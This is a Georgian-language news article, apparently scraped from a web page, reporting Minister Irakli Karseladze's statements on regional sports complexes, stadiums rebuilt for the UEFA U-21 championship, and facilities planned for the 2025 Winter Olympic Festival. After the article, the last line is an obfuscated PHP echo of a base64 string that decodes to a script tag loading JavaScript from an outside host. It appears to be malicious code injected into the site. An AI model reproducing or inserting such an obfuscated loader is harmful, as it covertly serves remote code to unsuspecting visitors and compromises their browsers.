celsiusi
ავერსი შნაიდერი

 ,,რეგიონული განვითარებისა და ინფრასტრუქტურის სამინისტრო ქვეყნის სხავადასხვა რეგიონში სპორტული ინფრასტრუქტურის განვითარების 8 პროექტს ახორციელებს. წელს დასრულდება ახალციხისა და ზუგდიდის, სოფელ არხილოსკალოს სპორტული კომპლექსების, ბოლნისისა და წნორის მრავალფუნქციური სპორტული დარბაზის მშენებლობა. სპორტული კომპლექსები და საცურაო აუზები უკვე წარმატებით ფუნქციონირებს ფოთსა და ქუთაისში“ -ამის შესახებ რეგიონული განვითარებისა და ინფრასტრუქტურის მინისტრმა ირაკლი ქარსელაძემ სპორტული ინფრასტრუქტურის მიმართულებით დაგეგმილ პროექტებზე საუბრისას განაცხადა.

მინისტრმა აღნიშნა ის დიდი გამოცდილება, რაც სამინისტროს, გასულ წლებში, სპორტული ინფრასტრუქტურის მშენებლობის კუთხით დაუგროვდა.
 
,,საქართველოში უეფას 21 წლამდე ევროპის ჩემპიონატის ღირსეულად ჩასატარებლად, გასულ წელს თბილისში, ქუთაისში, წყალტუბოში, ქობულეთსა და ბათუმში, ჯამში, 11 საფეხბურთო სატდიონის რეაბილიტაცია-მშენებლობა დავასრულეთ. რამდენიმე წელია უკვე ფუნქციონირებს საფეხბურთო სტადიონები ფოთსა და ხაშურში და უახლოეს მომავალში გახისნება მარნეულის საფეხბურთო სტადიონიც“-აღნიშნა ირაკლი ქარსელაძემ.
 
მინისტრის განცხადებით, 2024 წელი საკმაოდ დატვირთული იქნება არა მხოლოდ მიმდინარე სამუშაოებით, არამედ დასრულებული ინფრასტრუქტურული პროექტებით, რაც ხელს შეუწყობს სხვადასხვა რეგიონში არსებულ პოტენციალს და სპორტული პროფესიული კოლექტივების შემდგომ წარმატებებს.
 
,,2024 წელს დავიწყეთ 2025 წლის ზამთრის ოლიმპიური ფესტივალისთვის მზადება, რაც გულისხმობს თბილისში ყინულის სასახლის აშენებას და ბაკურიანში ბიატლონის და ქროსქანთრის თხილამურებით რბოლისთვის ინფრასტრუქტურის შექმნას. ბუნებრივია ყველაფერი საერთაშორისო სტანდარტის შესაბამისად განხორციელდება და კიდევ უფრო მეტი ადამიანი ჩაერთვება სპორტის სხვადასხვა სახეობაში“-აღნიშნა ირაკლი ქარსელაძემ.
161
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");